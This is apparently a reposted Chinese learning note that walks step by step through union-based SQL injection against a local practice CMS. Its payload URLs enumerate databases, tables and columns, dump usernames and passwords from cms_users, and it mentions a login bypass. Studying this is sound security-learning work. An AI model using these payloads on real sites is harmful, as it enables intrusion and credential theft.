简单cmsSQL注入

Posted Ooooh学习笔记

tags:

篇首语:本文由小常识网(cha138.com)小编为大家整理,主要介绍了简单cmsSQL注入相关的知识,希望对你有一定的参考价值。

1.判断为数字型注入还是字符型注入

 

单引号和双引号都报错 判断为数值型注入

2,布尔注入 判断是否存在SQL注入漏洞

http://127.0.0.1/cms/show.php?id=33 and 1=1

http://127.0.0.1/cms/show.php?id=33 and 1=2

 

简单cmsSQL注入


 

 

当条件为真时 正常回显 条件为假时 回显不正常 SQL漏洞

3 通过order by 判断字段数

http://127.0.0.1/cms/show.php?id=33 order by 15

简单cmsSQL注入

 

通过二分法 最后确定字段数为15

4, 通过union 联合注入 并将id的值改为不存在的数值 报错

http://127.0.0.1/cms/show.php?id=-33 union select 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15  --+

简单cmsSQL注入

 

确认在 3 11的位置会在网页中进行回显

5 暴库

http://127.0.0.1/cms/show.php?id=-32 union select 1,2,database(),4,5,6,7,8,9,10,11,12,13,14,15  --+

 

数据库的名称为cms

6 暴所有数据库

出现Illegal mix of collations for operation 'UNION' 利用convert(schema_name using latin1)修改编码

Group_concat 将信息输出在一行里

http://127.0.0.1/cms/show.php?id=-32 union select 1,2,group_concat(convert(schema_name using latin1)),4,5,6,7,8,9,10,11,12,13,14,15 from information_schema.schemata --+

简单cmsSQL注入

7暴所有表名

http://127.0.0.1/cms/show.php?id=-32 union select 1,2,group_concat(convert(table_name using latin1)),4,5,6,7,8,9,10,11,12,13,14,15 from information_schema.tables where table_schema='cms' --+

 

简单cmsSQL注入


8 暴所有列名

http://127.0.0.1/cms/show.php?id=-32 union select 1,2,group_concat(convert(column_name using latin1)),4,5,6,7,8,9,10,11,12,13,14,15 from information_schema.columns where table_schema='cms' and  table_name='cms_users'--+

 

简单cmsSQL注入 

9 获取字段

http://127.0.0.1/cms/show.php?id=-32 union select 1,2,group_concat(convert(username using latin1)),4,5,6,7,8,9,10,group_concat(convert(password using latin1)),12,13,14,15 from cms_users --+

 


利用concat_ws一次性爆出username password

http://127.0.0.1/cms/show.php?id=-32 union select 1,2,group_concat(convert(concat_ws(' ',username,password) using latin1)),4,5,6,7,8,9,10,11,12,13,14,15 from cms_users --+


进入后台

1.输入单引号 报错 通过报错信息可判断多了一个单引号

 

 

使用万能密码进行登录


以上是关于简单cmsSQL注入的主要内容,如果未能解决你的问题,请参考以下文章

sql注入简单实现二次注入

实验吧web-简单的sql注入之1

简单SQL注入试探

简单sql注入学习

php如何防止sql注入

记一次简单的sql注入